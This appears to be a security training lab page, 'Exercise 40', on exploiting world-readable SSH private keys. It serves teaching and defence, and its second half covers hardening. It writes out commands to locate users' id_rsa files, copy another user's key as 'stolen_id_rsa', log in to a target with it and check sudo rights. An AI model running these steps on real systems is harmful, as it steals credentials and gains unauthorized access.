Logo Light

Network

Web Apps

System

Cloud

Cryptography

IoT

Exercise 40: Exploiting Weak Permissions on SSH Keys

by | Jul 22, 2025 | 0 comments

Objective: Exploit weak file permissions on SSH private keys to gain unauthorized access to remote systems, and learn how to secure SSH keys.

Scenario: SSH keys are used to authenticate to remote systems securely. If private keys have weak permissions, such as being world-readable, attackers can use them to gain unauthorized access. Your task is to identify and exploit such vulnerabilities and implement strategies to secure SSH key storage.

Lab Setup

  1. Environment:
    • A Linux system with SSH keys stored in user home directories.
  2. Tools Required:
    • Terminal access.

Lab Steps

Step 1: Identify SSH Private Keys

  1. Locate SSH private keys on the system: find /home -name "id_rsa" -type f 2>/dev/null
  2. Check the permissions of the identified keys: ls -l /path/to/private/key
    • Example output: -rw-r--r-- 1 user user 1675 Jan 1 10:00 /home/user/.ssh/id_rsa
    • If the key is world-readable (-rw-r--r--), it is vulnerable.

Step 2: Exploit Weak Permissions

  1. Copy the vulnerable private key to your machine: cp /home/user/.ssh/id_rsa ./stolen_id_rsa
  2. Set the correct permissions on the key for usage: chmod 600 ./stolen_id_rsa
  3. Attempt to authenticate to the remote system using the private key: ssh -i ./stolen_id_rsa user@<target_ip>

Step 3: Verify Access

  1. Check your current access level: whoami
  2. Attempt privilege escalation if applicable (e.g., sudo access): sudo -l

Solution

Explanation:

  • Weak permissions on SSH private keys allow unauthorized users to copy and use the keys to authenticate to remote systems.

Prevention:

  1. Restrict Key Permissions:
    • Ensure SSH private keys are readable only by the owner: chmod 600 ~/.ssh/id_rsa
  2. Use Encrypted Keys:
    • Protect private keys with a passphrase: ssh-keygen -p -f ~/.ssh/id_rsa
  3. Audit SSH Configurations:
    • Regularly review /etc/ssh/sshd_config to ensure secure settings: PermitRootLogin no PasswordAuthentication no
  4. Monitor SSH Key Usage:
    • Log SSH authentication attempts for anomaly detection: sudo tail -f /var/log/auth.log

Testing and Verification

  1. Attempt to access the private key after restricting its permissions to confirm it is protected.
  2. Test key-based authentication with passphrase-protected keys to verify security.
  3. Monitor SSH logs to ensure no unauthorized access is occurring.

Reflection

This exercise demonstrates the risks associated with weak permissions on SSH private keys and emphasizes the importance of securing key storage. By enforcing proper permissions and using encryption, you can protect remote systems from unauthorized access.

0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *